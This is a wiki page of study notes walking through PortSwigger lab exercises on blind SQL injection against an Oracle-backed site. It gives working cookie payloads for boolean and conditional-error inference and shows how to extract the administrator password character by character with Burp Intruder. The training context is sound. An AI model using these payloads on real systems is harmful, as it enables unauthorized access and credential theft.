SQL Injection/Blind
From charlesreid1
A short guide to blind SQL injection.
Basic Overview
Link: https://portswigger.net/web-security/sql-injection/blind
Blind SQL injection is an attempt to tamper with parameters that are fed into SQL queries, but whose results are not returned directly to the user.
Example: requests to a web application contain a cookie with a tracking ID that is sent in a header. That tracking ID is used by the server in an SQL query, and depending on the result of the query, the page will render differently for the end user.
Blind SQL Injection with Conditional Responses
Lab 11: Blind SQL injection with conditional responses: https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
TrackingId=xyz' AND '1'='1
The page shows a welcome back message
change it to TrackingId=xyz' AND '1'='2
welcome back message disappears. this enables testing a single boolean condition and inferring the result.
Blind SQL Injection with Conditional Errors
Lab 12: Blind SQL injection with conditional errors: https://portswigger.net/web-security/sql-injection/blind
"conditional errors" means, we are injecting conditional statements, and intentionally causing errors when certain conditions are met/not met
that allows us to "see" the state of the data in the database
step 1: prove parameter is vulnerable
- to prove the parameter is vulnerable to SQL injection, use concat operator
||
' || (select '') || '
- this is a well-formatted SQL query, but returns a 500 error
- weird, because this should work, not return a 500 error
- indication that this could be an oracle database, since it requires a FROM clause to be well-formatted
' || (select '' from dual) || '
- Paste that SQL into the Cookie TrackingId, use Control + U to URL encode it
- dual is a built-in Oracle database
- this works, indicating this is, in fact, an Oracle database
- but if we replace "dual" with "dualoiweuroqiurepoiquwer" then it fails
step 2: confirm users table exists in database
' || (select from users) || '
- this returns an internal server error
- the problem may be with the number of fields returned (???)
- modify query to the following:
' || (select from users where rownum = 1) || '
- that returns a 200, indicating there is, in fact, a users table in the daatabase
step 3: confirm the administrator user exists in the users table
- to do this: modify prior SQL query
' || (select '' from users where username='administrator') || '
- the problem: either way, this will return a 200 (if there is no administrator user, just doesn't return anything)
- solution: add conditional, and divide by zero if conditional is met
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || '
should cause an error' || (select CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || '
should NOT cause an error- now we can use that to check for the username:
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator') || '
- the FROM section is executed first. if it is true, then it executes the select portion of the query (which raises an error). if it is false, then it skips the select portion of the query, so it never outputs an error.
- in other words, 200 response means user does not exist in database
step 4: check the length of the password by modifying the same query
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and LENGTH(password)>1) || '
- the FROM section is executed first. if it is true (if password length > 1), it raises a 500 error. increment 1 until you get the final length of the password (whatever password length it returns 200 for).
- to generate lots of requests, right-click request and choose Send to Intruder
- Intruder > Positions > Clear
- select "1" (password length) and choose Add
- Intruder > Payloads > Numbers, sequential, from 1 to 50, step count of 1
- when payload of 20 is sent, it returns a 200 status code
- so, we know length of password is 20 (condition is not met when > 20)
step 5: output the administrator password
- we have 20 characters to enumerate
- modify query from preceding, but use substring function
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and SUBSTR(password,1,1)='a') || '
- how does this work?
- first thing that gets run is the FROM clause, which checks if there is a users table and a username administrator, and it checks if the first character is equal to a. if so, it will run the CASE statement, which will run the code that raises the error.
- 200 response means first character of password is NOT a
- 500 response means first character of password IS a
- copy that SQL query and put it into Repeater:
- copy and paste into TrackingId
- Control + U to URL encode it
- 200 response - meaning a is not the first character of the password
- Intruder > Positions > Clear
- select "a" and choose Add,
- then go to Intruder > Payloads
- Payload Type: Brute forcer (tries all the alphanumeric characters)
- min length = 1, max length = 1
- generates 36 requests,
- looking for one 500 response ("w")
- next, try for second, then third, and so on.
- instead of doing that 20 times, automate it:
step 6: automate the attack in burp suite
- Intruder > Positions
- Change Attack type to Cluster bomb
- select substring position number "1" and choose Add. select character "a" being checked and choose Add.
- Intruder > Payloads
- payload parameter 1 - position - Numbers type (from 1, to 20, step 1) - iterates over each letter position.
- payload parameter 2 - letter - Brute forcer (all alphanumeric characters, min length = max length = 1)
- this will generate 720 requests total
- filter > filter by response code (500 only)
- write it out, punch it in.